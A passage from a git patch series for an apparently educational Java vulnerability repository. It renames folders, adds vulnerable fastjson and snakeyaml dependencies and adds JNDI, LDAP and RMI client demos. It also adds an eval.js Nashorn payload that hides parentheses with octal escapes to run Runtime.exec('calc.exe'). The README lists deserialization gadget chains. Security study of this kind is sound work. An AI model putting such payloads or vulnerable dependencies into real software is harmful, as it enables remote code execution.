+ + String result = xPathExpr.evaluate(new InputSource(data)); + System.out.println(result); + } +} From 569ed3eb6e3426ba3617228a0bda16d33e3bf354 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 9 Apr 2025 19:57:08 +0800 Subject: [PATCH 34/35] rename folder name --- {general => jdk8}/bytecodes/Foo.java | 0 {general => jdk8}/bytecodes/Hello.java | 0 .../bytecodes/HelloTemplatesImpl.java | 0 {general => jdk8}/pom.xml | 29 +++++++++++++++++++ .../src/main/java/com/govuln/beans/Cat.java | 0 .../main/java/com/govuln/bytes/HelloBCEL.java | 0 .../com/govuln/bytes/HelloClassLoader.java | 0 .../com/govuln/bytes/HelloDefineClass.java | 0 .../com/govuln/bytes/HelloTemplatesImpl.java | 0 .../java/com/govuln/client/JNDIClient.java | 14 +++++++++ .../java/com/govuln/client/LDAPClient.java | 21 ++++++++++++++ .../java/com/govuln/client/RMIClient.java | 9 ++++++ .../deserialization/CommonsBeanutils1.java | 0 .../deserialization/CommonsCollections1.java | 0 .../CommonsCollections1For4.java | 0 .../deserialization/CommonsCollections2.java | 0 .../CommonsCollections2TemplatesImpl.java | 0 .../deserialization/CommonsCollections3.java | 0 .../CommonsCollections3For4.java | 0 .../deserialization/CommonsCollections6.java | 0 .../CommonsCollections6For4.java | 0 .../CommonsCollections6Multiple.java | 0 .../CommonsCollectionsIntro.java | 0 .../CommonsCollectionsIntro2.java | 0 .../CommonsCollectionsIntro3.java | 0 .../com/govuln/deserialization/JDK7u21.java | 0 .../TemplatesImplDeserialization.java | 0 .../com/govuln/deserialization/URLDNS.java | 0 jdk8/src/main/java/com/govuln/js/Eval.java | 20 +++++++++++++ .../com/govuln/serialization/Converter.java | 0 .../serialization/UserSerialization.java | 0 .../com/govuln/serialization/model/User.java | 0 .../govuln/xxe/DocumentBuilderExample.java | 0 .../java/com/govuln/xxe/SAXParserExample.java | 0 .../java/com/govuln/xxe/XMLReaderExample.java | 0 .../java/com/govuln/xxe/XMLStreamExample.java | 0 .../govuln/xxe/XPathExpressionExample.java | 0 .../src/main/java/evil/EvilTemplatesImpl.java | 0 .../src/main/java/evil/Hello.java | 0 jdk8/src/main/resources/eval.js | 4 +++ 40 files changed, 97 insertions(+) rename {general => jdk8}/bytecodes/Foo.java (100%) rename {general => jdk8}/bytecodes/Hello.java (100%) rename {general => jdk8}/bytecodes/HelloTemplatesImpl.java (100%) rename {general => jdk8}/pom.xml (81%) rename {general => jdk8}/src/main/java/com/govuln/beans/Cat.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloBCEL.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloClassLoader.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloDefineClass.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java (100%) create mode 100644 jdk8/src/main/java/com/govuln/client/JNDIClient.java create mode 100644 jdk8/src/main/java/com/govuln/client/LDAPClient.java create mode 100644 jdk8/src/main/java/com/govuln/client/RMIClient.java rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections1.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections2.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections3.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/JDK7u21.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/URLDNS.java (100%) create mode 100644 jdk8/src/main/java/com/govuln/js/Eval.java rename {general => jdk8}/src/main/java/com/govuln/serialization/Converter.java (100%) rename {general => jdk8}/src/main/java/com/govuln/serialization/UserSerialization.java (100%) rename {general => jdk8}/src/main/java/com/govuln/serialization/model/User.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/DocumentBuilderExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/SAXParserExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XMLReaderExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XMLStreamExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XPathExpressionExample.java (100%) rename {general => jdk8}/src/main/java/evil/EvilTemplatesImpl.java (100%) rename {general => jdk8}/src/main/java/evil/Hello.java (100%) create mode 100644 jdk8/src/main/resources/eval.js diff --git a/general/bytecodes/Foo.java b/jdk8/bytecodes/Foo.java similarity index 100% rename from general/bytecodes/Foo.java rename to jdk8/bytecodes/Foo.java diff --git a/general/bytecodes/Hello.java b/jdk8/bytecodes/Hello.java similarity index 100% rename from general/bytecodes/Hello.java rename to jdk8/bytecodes/Hello.java diff --git a/general/bytecodes/HelloTemplatesImpl.java b/jdk8/bytecodes/HelloTemplatesImpl.java similarity index 100% rename from general/bytecodes/HelloTemplatesImpl.java rename to jdk8/bytecodes/HelloTemplatesImpl.java diff --git a/general/pom.xml b/jdk8/pom.xml similarity index 81% rename from general/pom.xml rename to jdk8/pom.xml index 29d9524..fb1091e 100644 --- a/general/pom.xml +++ b/jdk8/pom.xml @@ -54,6 +54,35 @@ commons-io 2.10.0 + + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + org.yaml + snakeyaml + 1.33 + + + + + com.alibaba + fastjson + 1.2.24 + + + + + org.apache.bcel + bcel + 6.10.0 + + diff --git a/general/src/main/java/com/govuln/beans/Cat.java b/jdk8/src/main/java/com/govuln/beans/Cat.java similarity index 100% rename from general/src/main/java/com/govuln/beans/Cat.java rename to jdk8/src/main/java/com/govuln/beans/Cat.java diff --git a/general/src/main/java/com/govuln/bytes/HelloBCEL.java b/jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloBCEL.java rename to jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java diff --git a/general/src/main/java/com/govuln/bytes/HelloClassLoader.java b/jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloClassLoader.java rename to jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloDefineClass.java rename to jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java rename to jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java diff --git a/jdk8/src/main/java/com/govuln/client/JNDIClient.java b/jdk8/src/main/java/com/govuln/client/JNDIClient.java new file mode 100644 index 0000000..f045cb4 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/JNDIClient.java @@ -0,0 +1,14 @@ +package com.govuln.client; + +import javax.naming.Context; +import javax.naming.InitialContext; +import javax.naming.directory.InitialDirContext; +import javax.naming.ldap.InitialLdapContext; +import java.util.Hashtable; + +public class JNDIClient { + public static void main(String[] args) throws Exception { + Context initialContext = new InitialContext(); + initialContext.lookup("ldap://127.0.0.1:389/sample"); + } +} diff --git a/jdk8/src/main/java/com/govuln/client/LDAPClient.java b/jdk8/src/main/java/com/govuln/client/LDAPClient.java new file mode 100644 index 0000000..8f68ba1 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/LDAPClient.java @@ -0,0 +1,21 @@ +package com.govuln.client; + +import javax.naming.Context; +import javax.naming.InitialContext; +import javax.naming.NamingException; +import javax.naming.directory.InitialDirContext; +import java.util.Hashtable; + +public class LDAPClient { + public static void main(String[] args) throws NamingException { + Hashtable env = new Hashtable<>(); + env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory"); + env.put(Context.SECURITY_AUTHENTICATION, "simple"); + env.put(Context.SECURITY_PRINCIPAL, "user"); + env.put(Context.SECURITY_CREDENTIALS, "password"); + env.put(Context.PROVIDER_URL, "ldap://127.0.0.1:389"); + InitialContext ctx = new InitialDirContext(env); + ctx.lookup("sample"); + ctx.close(); + } +} diff --git a/jdk8/src/main/java/com/govuln/client/RMIClient.java b/jdk8/src/main/java/com/govuln/client/RMIClient.java new file mode 100644 index 0000000..00c6ef2 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/client/RMIClient.java @@ -0,0 +1,9 @@ +package com.govuln.client; + +import java.rmi.Naming; + +public class RMIClient { + public static void main(String[] args) throws Exception { + Naming.lookup("rmi://localhost:1099/test"); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/JDK7u21.java rename to jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java rename to jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java diff --git a/general/src/main/java/com/govuln/deserialization/URLDNS.java b/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/URLDNS.java rename to jdk8/src/main/java/com/govuln/deserialization/URLDNS.java diff --git a/jdk8/src/main/java/com/govuln/js/Eval.java b/jdk8/src/main/java/com/govuln/js/Eval.java new file mode 100644 index 0000000..6c11506 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/js/Eval.java @@ -0,0 +1,20 @@ +package com.govuln.js; + +import javax.script.ScriptEngine; +import javax.script.ScriptEngineManager; +import java.io.FileReader; + +import jdk.nashorn.api.scripting.NashornException; +import jdk.nashorn.api.scripting.NashornScriptEngine; +import jdk.nashorn.api.scripting.NashornScriptEngineFactory; + +import java.io.InputStream; +import java.lang.Exception; + +public class Eval { + public static void main(String[] args) throws Exception { + ScriptEngineManager manager = new ScriptEngineManager(); + ScriptEngine engine = manager.getEngineByName("JavaScript"); + engine.eval(new FileReader("src/main/resources/eval.js")); + } +} diff --git a/general/src/main/java/com/govuln/serialization/Converter.java b/jdk8/src/main/java/com/govuln/serialization/Converter.java similarity index 100% rename from general/src/main/java/com/govuln/serialization/Converter.java rename to jdk8/src/main/java/com/govuln/serialization/Converter.java diff --git a/general/src/main/java/com/govuln/serialization/UserSerialization.java b/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java similarity index 100% rename from general/src/main/java/com/govuln/serialization/UserSerialization.java rename to jdk8/src/main/java/com/govuln/serialization/UserSerialization.java diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/jdk8/src/main/java/com/govuln/serialization/model/User.java similarity index 100% rename from general/src/main/java/com/govuln/serialization/model/User.java rename to jdk8/src/main/java/com/govuln/serialization/model/User.java diff --git a/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java rename to jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java diff --git a/general/src/main/java/com/govuln/xxe/SAXParserExample.java b/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/SAXParserExample.java rename to jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java diff --git a/general/src/main/java/com/govuln/xxe/XMLReaderExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XMLReaderExample.java rename to jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java diff --git a/general/src/main/java/com/govuln/xxe/XMLStreamExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XMLStreamExample.java rename to jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java diff --git a/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java similarity index 100% rename from general/src/main/java/com/govuln/xxe/XPathExpressionExample.java rename to jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java diff --git a/general/src/main/java/evil/EvilTemplatesImpl.java b/jdk8/src/main/java/evil/EvilTemplatesImpl.java similarity index 100% rename from general/src/main/java/evil/EvilTemplatesImpl.java rename to jdk8/src/main/java/evil/EvilTemplatesImpl.java diff --git a/general/src/main/java/evil/Hello.java b/jdk8/src/main/java/evil/Hello.java similarity index 100% rename from general/src/main/java/evil/Hello.java rename to jdk8/src/main/java/evil/Hello.java diff --git a/jdk8/src/main/resources/eval.js b/jdk8/src/main/resources/eval.js new file mode 100644 index 0000000..f80f6b6 --- /dev/null +++ b/jdk8/src/main/resources/eval.js @@ -0,0 +1,4 @@ +var a = new java.beans.Customizer { + setObject: eval +} +a.object = "java.lang.Runtime.getRuntime\50\51.exec\50'calc.exe'\51"; \ No newline at end of file From 9573c899d8a9b7328addef596c85aefedcd722cb Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 9 Apr 2025 20:02:05 +0800 Subject: [PATCH 35/35] rename folder name --- README.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index d6a7031..870ec80 100644 --- a/README.md +++ b/README.md @@ -29,22 +29,22 @@ 字节码: -- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/bytes/HelloClassLoader.java) -- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/bytes/HelloDefineClass.java) -- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) -- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/bytes/HelloBCEL.java) +- 远程字节码加载Demo:[HelloClassLoader](jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java) +- 系统默认defineClass加载字节码Demo:[HelloDefineClass](jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java) +- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java) 反序列化: -- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) -- 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 -- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) -- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) -- 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) -- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) -- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) -- 简化版Java原生利用链 [JDK7u21](general/src/main/java/com/govuln/deserialization/JDK7u21.java) +- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) +- 我简化的[CommonsCollections6](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) +- 我简化的[CommonsCollections3](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java) +- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) +- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: